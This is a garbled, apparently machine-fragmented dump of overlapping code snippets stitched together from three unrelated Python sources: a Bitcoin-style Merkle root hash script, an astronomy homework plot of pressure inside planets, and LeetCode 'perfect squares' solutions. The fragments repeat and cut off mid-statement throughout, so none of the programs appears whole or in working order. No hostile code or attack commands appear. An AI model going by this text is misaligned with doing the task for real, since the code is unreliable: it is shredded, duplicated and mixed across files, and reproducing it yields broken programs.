"h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) + h(", "header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes)", "1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0 j =", "i += 2 j += 1 hashes = hashes[:int(len(hashes) / 2)] # tree", "h(1) + h(2) ) + h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766", "h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2", ") ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1", "implmentation BlockMerkleRoot ---> new bitcoin core 
implementation ''' import pandas as pd from", "python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new", "sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i", "0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1)", "as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation '''", "Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas as pd", "# h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) +", "--> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas as", "reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import", "h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1", "+ h(2) ) + h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset", "= 0 while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i", "use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core", "+ h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2", "dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset,", "> 1: if len(hashes) % 2 != 0: 
hashes.append(hashes[-1]) i = 0 j", "in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot --->", "93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df =", "import StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3)", "''' Generate root merkle tree hash in python. I use https://github.com/bitcoin/bitcoin as reference:", "merkle tree hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi", "pandas as pd from hashlib import sha256 from io import StringIO # h(", "tree hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation", "1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes = hashes[:int(len(hashes) / 2)] #", "sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes =", "while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest()", "x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1])", "+ h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3", "# b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) + h( h(3) +", "b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) + h( h(3) + h(4)", "+ 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes = hashes[:int(len(hashes) / 2)]", "sha256 from io import StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8", "j = 0 
while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] +", "transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes", "hashes.append(hashes[-1]) i = 0 j = 0 while i + 1 < len(hashes):", "df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2 !=", "+ hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes = hashes[:int(len(hashes)", "import pandas as pd from hashlib import sha256 from io import StringIO #", "hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes = hashes[:int(len(hashes) /", ") # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h(", "< len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j", "h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2)", "new bitcoin core implementation ''' import pandas as pd from hashlib import sha256", "h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) #", ") # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\")", "h( h(1) + h(2) ) + h( h(3) + h(4) ) ) #", "len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0 j = 0 while", "1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2", "len(hashes) > 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0", "h(3) + h(4) ) # 
b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) )", "pd from hashlib import sha256 from io import StringIO # h( h(1) +", "# h( h( h(1) + h(2) ) + h( h(3) + h(4) )", "# 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h(", "hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot", "transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:,", "while len(hashes) > 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i =", "pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1:", "if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0 j = 0", ") # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) + h( h(3)", "encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if", "\"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while", "h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) )", "''' import pandas as pd from hashlib import sha256 from io import StringIO", "0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2 != 0:", "StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', 
header=None)", "!= 0: hashes.append(hashes[-1]) i = 0 j = 0 while i + 1", "h( h( h(1) + h(2) ) + h( h(3) + h(4) ) )", "1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed in a hash print(hashes[0])", "hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) %", "= sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes", "implementation ''' import pandas as pd from hashlib import sha256 from io import", "0 while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i +", "= 0 j = 0 while i + 1 < len(hashes): hashes[j] =", "+= 2 j += 1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed", "https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation", "df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes)", "= StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8',", "+ h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) +", "h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 #", "import sha256 from io import StringIO # h( h(1) + h(2) ) #", ") + h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\", "core implementation ''' import pandas as pd from hashlib import sha256 from io", "hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1", "+ h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 
dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1", "transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist()", "= df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2", "2 != 0: hashes.append(hashes[-1]) i = 0 j = 0 while i +", "0: hashes.append(hashes[-1]) i = 0 j = 0 while i + 1 <", "j += 1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed in a", "h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2", "from io import StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 #", "+= 1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed in a hash", "transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x:", "i = 0 j = 0 while i + 1 < len(hashes): hashes[j]", "transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda", "---> new bitcoin core implementation ''' import pandas as pd from hashlib import", "# 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df", "BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas as pd from hashlib", "Generate root merkle tree 
hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree" ]
[ "P def f(x): P = 4e9 return ones(shape(x)) * P x = arange(0,3e6,100)", "label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4]) #~ plt.ylabel('some", "5510 * 9.807 * x return P def jupiter(x): P = 1330 *", "for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend()", "x return P def mars(x): P = 3930 * 3.711 * x return", "def earth(x): P = 5510 * 9.807 * x return P def jupiter(x):", "9.807 * x return P def jupiter(x): P = 1330 * 24.79 *", "= 4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth", "= arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)')", "def f(x): P = 4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max", "P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside", "x return P def f(x): P = 4e9 return ones(shape(x)) * P x", "P = 3930 * 3.711 * x return P def earth(x): P =", "* 9.807 * x return P def jupiter(x): P = 1330 * 24.79", "* x return P def earth(x): P = 5510 * 9.807 * x", "label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4]) #~ plt.ylabel('some numbers') plt.show()", "return P def mars(x): P = 3930 * 3.711 * x return P", "= 3340 * 1.622 * x return P def mars(x): P = 3930", "mars(x): P = 3930 * 3.711 * x return P def earth(x): P", "jupiter(x): P = 1330 * 24.79 * x return P def f(x): P", "= 1330 * 24.79 * x return P def f(x): P = 4e9", "* 24.79 * x return P def f(x): P = 4e9 return ones(shape(x))", "def mars(x): P = 3930 * 3.711 * x return P def earth(x):", "import matplotlib.pyplot as plt from 
pylab import * def moon(x): P = 3340", "plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x),", "plt from pylab import * def moon(x): P = 3340 * 1.622 *", "Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x))", "moon(x): P = 3340 * 1.622 * x return P def mars(x): P", "plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x),", "* P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure", "* def moon(x): P = 3340 * 1.622 * x return P def", "= earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure", "as plt from pylab import * def moon(x): P = 3340 * 1.622", "x return P def earth(x): P = 5510 * 9.807 * x return", "= 3930 * 3.711 * x return P def earth(x): P = 5510", "x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet", "P = 1330 * 24.79 * x return P def f(x): P =", "Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x),", "<filename>astro345_fall2015/astro345_hw12.py import matplotlib.pyplot as plt from pylab import * def moon(x): P =", "P def earth(x): P = 5510 * 9.807 * x return P def", "1330 * 24.79 * x return P def f(x): P = 4e9 return", "4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside", "earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for", "* x return P def f(x): P = 4e9 return ones(shape(x)) * P", "plt.xlabel('Depth Inside 
Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets')", "earth(x): P = 5510 * 9.807 * x return P def jupiter(x): P", "3.711 * x return P def earth(x): P = 5510 * 9.807 *", "P def mars(x): P = 3930 * 3.711 * x return P def", "import * def moon(x): P = 3340 * 1.622 * x return P", "plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4])", "return P def jupiter(x): P = 1330 * 24.79 * x return P", "ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)')", "P def jupiter(x): P = 1330 * 24.79 * x return P def", "def jupiter(x): P = 1330 * 24.79 * x return P def f(x):", "f(x): P = 4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max =", "24.79 * x return P def f(x): P = 4e9 return ones(shape(x)) *", "(meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon')", "matplotlib.pyplot as plt from pylab import * def moon(x): P = 3340 *", "* x return P def mars(x): P = 3930 * 3.711 * x", "return P def f(x): P = 4e9 return ones(shape(x)) * P x =", "Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars')", "3340 * 1.622 * x return P def mars(x): P = 3930 *", "3930 * 3.711 * x return P def earth(x): P = 5510 *", "1.622 * x return P def mars(x): P = 3930 * 3.711 *", "Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~", "P = 5510 * 9.807 * x return P def jupiter(x): P =", "P = 3340 * 1.622 * x return P def mars(x): P =", "y_max = earth(3e6) plt.xlabel('Depth Inside Planet 
(meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs", "P = 4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6)", "Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x),", "x return P def jupiter(x): P = 1330 * 24.79 * x return", "from pylab import * def moon(x): P = 3340 * 1.622 * x", "plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4]) #~ plt.ylabel('some numbers')", "vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter')", "* x return P def jupiter(x): P = 1330 * 24.79 * x", "plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4]) #~", "(Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth')", "= 5510 * 9.807 * x return P def jupiter(x): P = 1330", "Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max])", "def moon(x): P = 3340 * 1.622 * x return P def mars(x):", "* 1.622 * x return P def mars(x): P = 3930 * 3.711", "arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth", "* 3.711 * x return P def earth(x): P = 5510 * 9.807", "pylab import * def moon(x): P = 3340 * 1.622 * x return", "return ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside 
Planet", "return P def earth(x): P = 5510 * 9.807 * x return P" ]
[ "count else: for i, square in enumerate(squares): # Find the biggest square that", "in square_nums: if is_divided_by(n - k, count - 1): return True return False", "= min(dp[i], dp[i - square] + 1) return dp[-1] # Greedy DFS 1", "1, squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n,", "of perfect square numbers. e.g. n=12, count=3: true. n=12, count=2: false \"\"\" if", "# Greedy DFS 1 class Solution: def numSquares(self, n: int) -> int: squares", "+ 1, squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self, n): def", "the biggest square that is no larger than n # If current count", "enumerate(squares): # Find the biggest square that is no larger than n #", "break dp[i] = min(dp[i], dp[i - square] + 1) return dp[-1] # Greedy", "return dp[-1] # Greedy DFS 1 class Solution: def numSquares(self, n: int) ->", "answer, prune it if square <= n and count + 1 < self.ans:", "+ 1 < self.ans: self.dfs(n - square, count + 1, squares[i:]) # Greedy", "is_divided_by(n - k, count - 1): return True return False square_nums = set([i", "0: self.ans = count else: for i, square in enumerate(squares): # Find the", "perfect square numbers. e.g. n=12, count=3: true. 
n=12, count=2: false \"\"\" if count", "it if square <= n and count + 1 < self.ans: self.dfs(n -", "count is reaching second best answer, prune it if square <= n and", "current count is reaching second best answer, prune it if square <= n", "that is no larger than n # If current count is reaching second", "< self.ans: self.dfs(n - square, count + 1, squares[i:]) # Greedy DFS 2", "def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if \"n\" can be", "** 0.5) + 1)] dp = [0] + [float('inf')] * n for i", "range(1, n + 1): for square in squares: if i < square: break", "count == 1: return n in square_nums for k in square_nums: if is_divided_by(n", "False square_nums = set([i * i for i in range(1, int(n ** 0.5)", "-> int: squares = [x ** 2 for x in range(1, int(n **", "DFS 1 class Solution: def numSquares(self, n: int) -> int: squares = [x", "1): return True return False square_nums = set([i * i for i in", "1 class Solution: def numSquares(self, n: int) -> int: squares = [x **", "i < square: break dp[i] = min(dp[i], dp[i - square] + 1) return", "DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true", "for i in range(1, n + 1): for square in squares: if i", "+ [float('inf')] * n for i in range(1, n + 1): for square", "count + 1 < self.ans: self.dfs(n - square, count + 1, squares[i:]) #", "min(dp[i], dp[i - square] + 1) return dp[-1] # Greedy DFS 1 class", "0.5) + 1)] dp = [0] + [float('inf')] * n for i in", "n in square_nums for k in square_nums: if is_divided_by(n - k, count -", "e.g. n=12, count=3: true. 
n=12, count=2: false \"\"\" if count == 1: return", "int) -> int: squares = [x ** 2 for x in range(1, int(n", "self.ans: self.dfs(n - square, count + 1, squares[i:]) # Greedy DFS 2 class", "k in square_nums: if is_divided_by(n - k, count - 1): return True return", "is no larger than n # If current count is reaching second best", "\"\"\" if count == 1: return n in square_nums for k in square_nums:", "1 < self.ans: self.dfs(n - square, count + 1, squares[i:]) # Greedy DFS", "for k in square_nums: if is_divided_by(n - k, count - 1): return True", "square in enumerate(squares): # Find the biggest square that is no larger than", "1) return dp[-1] # Greedy DFS 1 class Solution: def numSquares(self, n: int)", "squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n, count):", "squares = [x ** 2 for x in range(int(n ** 0.5), 0, -1)]", "int: squares = [x ** 2 for x in range(1, int(n ** 0.5)", "biggest square that is no larger than n # If current count is", "\"count\" number of perfect square numbers. e.g. n=12, count=3: true. n=12, count=2: false", "class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if \"n\"", "square in squares: if i < square: break dp[i] = min(dp[i], dp[i -", "for x in range(1, int(n ** 0.5) + 1)] dp = [0] +", "in range(1, int(n ** 0.5) + 1)] dp = [0] + [float('inf')] *", "* i for i in range(1, int(n ** 0.5) + 1)]) for count", "self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n, count, squares):", "\"n\" can be decomposed into \"count\" number of perfect square numbers. e.g. n=12,", "self.ans def dfs(self, n, count, squares): if n == 0: self.ans = count", "= count else: for i, square in enumerate(squares): # Find the biggest square", "Greedy DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return:", "true. n=12, count=2: false \"\"\" if count == 1: return n in square_nums", "n=12, count=3: true. 
n=12, count=2: false \"\"\" if count == 1: return n", "squares = [x ** 2 for x in range(1, int(n ** 0.5) +", "def is_divided_by(n, count): \"\"\" return: true if \"n\" can be decomposed into \"count\"", "count, squares): if n == 0: self.ans = count else: for i, square", "count + 1, squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self, n):", "+ 1): for square in squares: if i < square: break dp[i] =", "square, count + 1, squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self,", "is_divided_by(n, count): \"\"\" return: true if \"n\" can be decomposed into \"count\" number", "+ 1)]) for count in range(1, n + 1): if is_divided_by(n, count): return", "[x ** 2 for x in range(1, int(n ** 0.5) + 1)] dp", "return True return False square_nums = set([i * i for i in range(1,", "x in range(1, int(n ** 0.5) + 1)] dp = [0] + [float('inf')]", "range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans", "i, square in enumerate(squares): # Find the biggest square that is no larger", "return: true if \"n\" can be decomposed into \"count\" number of perfect square", "0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self,", "is reaching second best answer, prune it if square <= n and count", "n: int) -> int: squares = [x ** 2 for x in range(1,", "range(1, int(n ** 0.5) + 1)]) for count in range(1, n + 1):", "* n for i in range(1, n + 1): for square in squares:", "in square_nums for k in square_nums: if is_divided_by(n - k, count - 1):", "x in range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares)", "can be decomposed into \"count\" number of perfect square numbers. e.g. 
n=12, count=3:", "+ 1) return dp[-1] # Greedy DFS 1 class Solution: def numSquares(self, n:", "= [x ** 2 for x in range(int(n ** 0.5), 0, -1)] self.ans", "numSquares(self, n: int) -> int: squares = [x ** 2 for x in", "# Greedy DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\"", "\"\"\" return: true if \"n\" can be decomposed into \"count\" number of perfect", "square <= n and count + 1 < self.ans: self.dfs(n - square, count", "squares) return self.ans def dfs(self, n, count, squares): if n == 0: self.ans", "else: for i, square in enumerate(squares): # Find the biggest square that is", "square that is no larger than n # If current count is reaching", "i for i in range(1, int(n ** 0.5) + 1)]) for count in", "n for i in range(1, n + 1): for square in squares: if", "if i < square: break dp[i] = min(dp[i], dp[i - square] + 1)", "int(n ** 0.5) + 1)] dp = [0] + [float('inf')] * n for", "2 for x in range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n,", "Find the biggest square that is no larger than n # If current", "0, squares) return 